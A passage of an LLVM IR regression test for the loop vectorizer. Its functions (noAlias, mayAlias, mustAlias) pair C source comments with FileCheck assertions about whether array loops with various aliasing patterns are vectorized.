%arrayidx2 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx2, i32 0, i32 %5
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx4 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx4, i32 0, i32 %8
%10 = load i32, i32* %arrayidx5, align 4
ret i32 %10
}
; /// Same objects, positive induction, multi-array, different sub-elements
; int noAlias06 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][i] = Bar.A[N+1][i] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias06(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias06(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%2 = load i32, i32* %N, align 4
%add = add nsw i32 %2, 1
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %add
%arrayidx1 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %1
%3 = load i32, i32* %arrayidx1, align 4
%4 = load i32, i32* %a.addr, align 4
%add2 = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%6 = load i32, i32* %N, align 4
%arrayidx3 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx3, i32 0, i32 %5
store i32 %add2, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx5 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx6 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx5, i32 0, i32 %8
%10 = load i32, i32* %arrayidx6, align 4
ret i32 %10
}
; /// Different objects, negative induction, constant distance
; int noAlias07 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias07(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias07(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Different objects, negative induction, shortening slide
; int noAlias08 (int a) {
; int i;
; for (i=0; i<SIZE-10; i++)
; Foo.A[SIZE-i-1] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias08(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias08(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 90
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Different objects, negative induction, widening slide
; int noAlias09 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-10] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias09(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias09(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 10
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
; /// Pointer access, negative stride, run-time check added
; int noAlias10 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+SIZE-i-1) = *(PB+SIZE-i-1) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @noAlias10(
; CHECK-NOT: sub {{.*}} <4 x i32>
; CHECK: ret
;
; TODO: This test vectorizes (with run-time check) on real targets with -O3)
; Check why it's not being vectorized even when forcing vectorization
define i32 @noAlias10(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 100
%2 = load i32, i32* %i, align 4
%idx.neg = sub i32 0, %2
%add.ptr1 = getelementptr inbounds i32, i32* %add.ptr, i32 %idx.neg
%add.ptr2 = getelementptr inbounds i32, i32* %add.ptr1, i32 -1
%3 = load i32, i32* %add.ptr2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%add.ptr3 = getelementptr inbounds i32, i32* %5, i32 100
%6 = load i32, i32* %i, align 4
%idx.neg4 = sub i32 0, %6
%add.ptr5 = getelementptr inbounds i32, i32* %add.ptr3, i32 %idx.neg4
%add.ptr6 = getelementptr inbounds i32, i32* %add.ptr5, i32 -1
store i32 %add, i32* %add.ptr6, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr7 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr7, align 4
ret i32 %10
}
; /// Different objects, negative induction, multi-array
; int noAlias11 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][SIZE-i-1] = Bar.B[N][SIZE-i-1] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias11(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias11(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%2 = load i32, i32* %N, align 4
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 2), i32 0, i32 %2
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %sub1
%3 = load i32, i32* %arrayidx2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%sub3 = sub nsw i32 100, %5
%sub4 = sub nsw i32 %sub3, 1
%6 = load i32, i32* %N, align 4
%arrayidx5 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx6 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx5, i32 0, i32 %sub4
store i32 %add, i32* %arrayidx6, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx7 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx8 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx7, i32 0, i32 %8
%10 = load i32, i32* %arrayidx8, align 4
ret i32 %10
}
; /// Same objects, negative induction, multi-array, different sub-elements
; int noAlias12 (int a) {
; int i, N=10;
; for (i=0; i<SIZE; i++)
; Bar.A[N][SIZE-i-1] = Bar.A[N+1][SIZE-i-1] + a;
; return Bar.A[N][a];
; }
; CHECK-LABEL: define i32 @noAlias12(
; CHECK: store <4 x i32>
; CHECK: ret
define i32 @noAlias12(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
%N = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 10, i32* %N, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%2 = load i32, i32* %N, align 4
%add = add nsw i32 %2, 1
%arrayidx = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %add
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx, i32 0, i32 %sub1
%3 = load i32, i32* %arrayidx2, align 4
%4 = load i32, i32* %a.addr, align 4
%add3 = add nsw i32 %3, %4
%5 = load i32, i32* %i, align 4
%sub4 = sub nsw i32 100, %5
%sub5 = sub nsw i32 %sub4, 1
%6 = load i32, i32* %N, align 4
%arrayidx6 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %6
%arrayidx7 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx6, i32 0, i32 %sub5
store i32 %add3, i32* %arrayidx7, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32, i32* %a.addr, align 4
%9 = load i32, i32* %N, align 4
%arrayidx8 = getelementptr inbounds [100 x [100 x i32]], [100 x [100 x i32]]* getelementptr inbounds (%struct.anon.0, %struct.anon.0* @Bar, i32 0, i32 0), i32 0, i32 %9
%arrayidx9 = getelementptr inbounds [100 x i32], [100 x i32]* %arrayidx8, i32 0, i32 %8
%10 = load i32, i32* %arrayidx9, align 4
ret i32 %10
}
; /// Same objects, positive induction, constant distance, just enough for vector size
; int noAlias13 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.A[i+4] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias13(
; CHECK: add nsw <4 x i32>
; CHECK: ret
define i32 @noAlias13(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%add = add nsw i32 %1, 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add1 = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add1, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Same objects, negative induction, constant distance, just enough for vector size
; int noAlias14 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.A[SIZE-i-5] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @noAlias14(
; CHECK: load <4 x i32>
; CHECK: ret
define i32 @noAlias14(i32 %a) #0 {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 5
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub2 = sub nsw i32 100, %4
%sub3 = sub nsw i32 %sub2, 1
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub3
store i32 %add, i32* %arrayidx4, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx5 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx5, align 4
ret i32 %7
}
;; === Now, the tests that we could vectorize with induction changes or run-time checks ===
; /// Different objects, swapped induction, alias at the end
; int mayAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mayAlias01(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Different objects, swapped induction, alias at the beginning
; int mayAlias02 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[SIZE-i-1] = Foo.B[i] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mayAlias02(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias02(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %4
%sub1 = sub nsw i32 %sub, 1
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %sub1
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; /// Pointer access, run-time check added
; int mayAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; *(PA+i) = *(PB+SIZE-i-1) + a;
; return *(PA+a);
; }
; CHECK-LABEL: define i32 @mayAlias03(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mayAlias03(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32*, i32** @PB, align 4
%add.ptr = getelementptr inbounds i32, i32* %1, i32 100
%2 = load i32, i32* %i, align 4
%idx.neg = sub i32 0, %2
%add.ptr1 = getelementptr inbounds i32, i32* %add.ptr, i32 %idx.neg
%add.ptr2 = getelementptr inbounds i32, i32* %add.ptr1, i32 -1
%3 = load i32, i32* %add.ptr2, align 4
%4 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %3, %4
%5 = load i32*, i32** @PA, align 4
%6 = load i32, i32* %i, align 4
%add.ptr3 = getelementptr inbounds i32, i32* %5, i32 %6
store i32 %add, i32* %add.ptr3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%7 = load i32, i32* %i, align 4
%inc = add nsw i32 %7, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%8 = load i32*, i32** @PA, align 4
%9 = load i32, i32* %a.addr, align 4
%add.ptr4 = getelementptr inbounds i32, i32* %8, i32 %9
%10 = load i32, i32* %add.ptr4, align 4
ret i32 %10
}
;; === Finally, the tests that should only vectorize with care (or if we ignore undefined behaviour at all) ===
; int mustAlias01 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[SIZE-i-1] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias01(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias01(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 1
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add2 = add nsw i32 %4, 10
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %add2
store i32 %add, i32* %arrayidx3, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx4 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx4, align 4
ret i32 %7
}
; int mustAlias02 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias02(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias02(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%arrayidx2 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %4
store i32 %add, i32* %arrayidx2, align 4
br label %for.inc
for.inc: ; preds = %for.body
%5 = load i32, i32* %i, align 4
%inc = add nsw i32 %5, 1
store i32 %inc, i32* %i, align 4
br label %for.cond
for.end: ; preds = %for.cond
%6 = load i32, i32* %a.addr, align 4
%arrayidx3 = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 0), i32 0, i32 %6
%7 = load i32, i32* %arrayidx3, align 4
ret i32 %7
}
; int mustAlias03 (int a) {
; int i;
; for (i=0; i<SIZE; i++)
; Foo.A[i+10] = Foo.B[SIZE-i-10] + a;
; return Foo.A[a];
; }
; CHECK-LABEL: define i32 @mustAlias03(
; CHECK-NOT: add nsw <4 x i32>
; CHECK: ret
define i32 @mustAlias03(i32 %a) nounwind {
entry:
%a.addr = alloca i32, align 4
%i = alloca i32, align 4
store i32 %a, i32* %a.addr, align 4
store i32 0, i32* %i, align 4
br label %for.cond
for.cond: ; preds = %for.inc, %entry
%0 = load i32, i32* %i, align 4
%cmp = icmp slt i32 %0, 100
br i1 %cmp, label %for.body, label %for.end
for.body: ; preds = %for.cond
%1 = load i32, i32* %i, align 4
%sub = sub nsw i32 100, %1
%sub1 = sub nsw i32 %sub, 10
%arrayidx = getelementptr inbounds [100 x i32], [100 x i32]* getelementptr inbounds (%struct.anon, %struct.anon* @Foo, i32 0, i32 2), i32 0, i32 %sub1
%2 = load i32, i32* %arrayidx, align 4
%3 = load i32, i32* %a.addr, align 4
%add = add nsw i32 %2, %3
%4 = load i32, i32* %i, align 4
%add2 = add nsw i32 %4, 10
